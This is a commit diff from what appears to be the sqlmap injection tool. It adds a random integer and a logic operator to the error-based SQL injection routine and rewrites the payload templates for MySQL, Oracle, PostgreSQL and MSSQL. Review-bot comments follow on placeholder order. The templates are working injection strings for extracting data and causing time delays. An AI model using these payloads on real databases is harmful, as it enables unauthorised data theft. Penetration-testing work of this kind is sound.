added randInt to error injection vectors

This commit is contained in:
Miroslav Stampar 2010-10-20 08:56:58 +00:00
parent dabbcf9e23
commit b032fdbf74
2 changed files with 8 additions and 6 deletions


@ -19,6 +19,7 @@ from lib.core.common import expandAsteriskForColumns
from lib.core.common import parseUnionPage
from lib.core.common import popValue
from lib.core.common import pushValue
from lib.core.common import randomInt
from lib.core.common import readInput
from lib.core.common import replaceNewlineTabs
from lib.core.common import safeStringFormat
@ -337,6 +338,8 @@ def __goError(expression, resumeValue=True):
Retrieve the output of a SQL query taking advantage of an error SQL
injection vulnerability on the affected parameter.
"""
logic = conf.logic
randInt = randomInt(1)
query = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].error)
query = agent.postfixQuery(query)
payload = agent.payload(newValue=query)
@ -362,7 +365,7 @@ def __goError(expression, resumeValue=True):
debugMsg = "query: %s" % expressionUnescaped
logger.debug(debugMsg)
forgedPayload = safeStringFormat(payload, expressionUnescaped)
forgedPayload = safeStringFormat(payload, (logic, randInt, expressionUnescaped))
result = Request.queryPage(urlencode(forgedPayload), content=True)
match = re.search(queries[kb.misc.testedDbms].errorRegex, result[0], re.DOTALL | re.IGNORECASE)
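Review bot: The new `safeStringFormat(payload, (logic, randInt, expressionUnescaped))` call introduces a positional contract with the `%s` placeholders of every `<error query=...>` template in the XML file, and nothing in the function records that order, so a future template with the placeholders swapped would silently put the logic operator where the number belongs. I would add, above that line, `# Tuple order must match the %s placeholders of the DBMS error template: logic operator, random integer, expression`. The docstring at the top of `__goError` should also mention that `randInt` is drawn once per call and reused for every request made by the loop, so all payloads within one call share the same literal. `randomInt(1)` presumably yields a single random digit (the argument reads as a digit count, not a range); if it can return 0, confirm the templates still raise the intended error with `AND 0=...` — I cannot verify `randomInt` from this page. The body of `__goError` continues past the end of this hunk.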


@ -24,7 +24,7 @@
<timedelay query="SELECT SLEEP(%d)" query2="SELECT BENCHMARK(5000000, MD5('%d'))"/>
<substring query="MID((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<error query="AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((%s),CHAR(58),CHAR(120),CHAR(58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" regex="SQL error:.*Duplicate entry '(?P&lt;result&gt;.+?)' for key"/>
<error query="%s (SELECT %s FROM(SELECT COUNT(*),CONCAT((%s),CHAR(58),CHAR(120),CHAR(58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" regex="SQL error:.*Duplicate entry '(?P&lt;result&gt;.+?)' for key"/>
<inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
<banner query="SELECT VERSION()"/>
<current_user query="SELECT CURRENT_USER()"/>
@ -91,8 +91,7 @@
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d00)"/>
<substring query="SUBSTR((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
<!--<error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(%s)||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P&lt;result&gt;.+?)&amp;quot;"/>-->
<error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P&lt;result&gt;.+?)&amp;quot;"/>
<error query="%s %s=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P&lt;result&gt;.+?)&amp;quot;"/>
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
<current_user query="SELECT USER FROM DUAL"/>
@ -176,7 +175,7 @@
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
<substring query="SUBSTR((%s)::text, %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
<error query="AND 1=CAST((%s)::text||CHR(58)||CHR(120)||CHR(58) AS NUMERIC)" regex="SQL error:.*invalid input syntax for type numeric:.*&quot;(?P&lt;result&gt;.+?)&quot;"/>
<error query="%s %s=CAST((%s)::text||CHR(58)||CHR(120)||CHR(58) AS NUMERIC)" regex="SQL error:.*invalid input syntax for type numeric:.*&quot;(?P&lt;result&gt;.+?)&quot;"/>
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
<banner query="SELECT VERSION()"/>
<current_user query="SELECT CURRENT_USER"/>
@ -243,7 +242,7 @@
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
<substring query="SUBSTRING((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
<error query="AND 1=CONVERT(INT,((%s)+CHAR(58)+CHAR(120)+CHAR(58)))" regex="Conversion failed when converting.*'(?P&lt;result&gt;.+?)' to data type int"/>
<error query="%s %s=CONVERT(INT,((%s)+CHAR(58)+CHAR(120)+CHAR(58)))" regex="Conversion failed when converting.*'(?P&lt;result&gt;.+?)' to data type int"/>
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
<banner query="SELECT @@VERSION"/>
<current_user query="SELECT SYSTEM_USER"/>
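Review bot: The MySQL error template is the only one of the four where the random integer is placed inside the subquery's SELECT list, `%s (SELECT %s FROM(...))`, while Oracle, PostgreSQL and MSSQL all use it as the left operand of an equality, `%s %s=(...)`; the caller passes the same `(logic, randInt, expression)` tuple to all of them, so the positional order still lines up, but the difference in shape is not explained. Either align MySQL with the others or add an XML comment above it such as `<!-- placeholders, in order: logic operator, random integer, expression; the integer sits in the SELECT list here because the GROUP BY duplicate-entry error fires regardless of the compared value -->`, hedged as I have not confirmed the latter claim against a live MySQL. The commented-out Oracle entry kept at the line above the live one is pre-existing dead configuration and could be dropped in a follow-up rather than carried along.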